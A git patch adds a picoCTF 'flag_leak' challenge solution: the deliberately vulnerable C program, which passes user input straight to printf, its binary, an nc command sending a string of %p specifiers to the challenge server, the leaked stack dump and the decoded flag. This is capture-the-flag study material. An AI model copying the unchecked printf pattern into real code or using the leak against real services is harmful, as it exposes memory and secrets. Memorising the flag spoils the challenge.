From f4feacef1d1cc02a9db34051ac747d0be10cfb82 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Tue, 3 Sep 2024 23:03:46 +0200
Subject: [PATCH] pwn/flag_leak

---
 pwn/flag_leak/flag.txt   |   5 +++++
 pwn/flag_leak/output.txt |   3 +++
 pwn/flag_leak/vuln       | Bin 0 -> 15876 bytes
 pwn/flag_leak/vuln.c     |  46 +++++++++++++++++++++++++++++++++++++++
 4 files changed, 54 insertions(+)
 create mode 100644 pwn/flag_leak/flag.txt
 create mode 100644 pwn/flag_leak/output.txt
 create mode 100755 pwn/flag_leak/vuln
 create mode 100644 pwn/flag_leak/vuln.c

diff --git a/pwn/flag_leak/flag.txt b/pwn/flag_leak/flag.txt
new file mode 100644
index 0000000..d98d0c0
--- /dev/null
+++ b/pwn/flag_leak/flag.txt
@@ -0,0 +1,5 @@
+# 0x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d343238
+#
+# https://gchq.github.io/CyberChef/#recipe=Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%20',true,false,true,false)Swap_endianness('Hex',4,true)From_Hex('Auto')&input=MHg2ZjYzNjk3MDB4N2I0NjU0NDMweDZiMzQzMzRjMHg1ZjY3NmUzMTB4NjczNDZjNDYweDY2NjYzMDVmMHgzNDc0NTM1ZjB4Mzk1ZjZiNjMweDMyNjUzOTM5MHg3ZDM0MzIzOA
+
+picoCTF{L34k1ng_Fl4g_0ff_St4ck_999e2824}
diff --git a/pwn/flag_leak/output.txt b/pwn/flag_leak/output.txt
new file mode 100644
index 0000000..f5f3e94
--- /dev/null
+++ b/pwn/flag_leak/output.txt
@@ -0,0 +1,3 @@
+$ nc saturn.picoctf.net 49378 <<<"%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p"
+Tell me a story and then I'll tell you one >> Here's a story -
+0xffc3b7100xffc3b7300x80493460x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x702570250x2570250x6f6369700x7b4654430x6b34334c0x5f676e310x67346c460x6666305f0x3474535f0x395f6b630x326539390x7d3432380xfbad20000x33f1c800(nil)0xea7119900x804c0000x8049410(nil)0x804c0000xffc3b7f80x80494180x20xffc3b8a40xffc3b8b0(nil)0xffc3b810(nil)(nil)0xea507ed5
diff --git a/pwn/flag_leak/vuln b/pwn/flag_leak/vuln
new file mode 100755
index 0000000000000000000000000000000000000000..666c7d1a41b03a6eae1b0f5d5854bf1edd4eab8d
GIT binary patch
literal 15876
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
Giv9~x9K#R*

literal 0
HcmV?d00001

diff --git a/pwn/flag_leak/vuln.c b/pwn/flag_leak/vuln.c
new file mode 100644
index 0000000..ca0491a
--- /dev/null
+++ b/pwn/flag_leak/vuln.c
@@ -0,0 +1,46 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <wchar.h>
+#include <locale.h>
+
+#define BUFSIZE 64
+#define FLAGSIZE 64
+
+void readflag(char* buf, size_t len) {
+  FILE *f = fopen("flag.txt","r");
+  if (f == NULL) {
+    printf("%s %s", "Please create 'flag.txt' in this directory with your",
+                    "own debugging flag.\n");
+    exit(0);
+  }
+
+  fgets(buf,len,f); // size bound read
+}
+
+void vuln(){
+   char flag[BUFSIZE];
+   char story[128];
+
+   readflag(flag, FLAGSIZE);
+
+   printf("Tell me a story and then I'll tell you one >> ");
+   scanf("%127s", story);
+   printf("Here's a story - \n");
+   printf(story);
+   printf("\n");
+}
+
+int main(int argc, char **argv){
+
+  setvbuf(stdout, NULL, _IONBF, 0);
+  
+  // Set the gid to the effective gid
+  // this prevents /bin/sh from dropping the privileges
+  gid_t gid = getegid();
+  setresgid(gid, gid, gid);
+  vuln();
+  return 0;
+}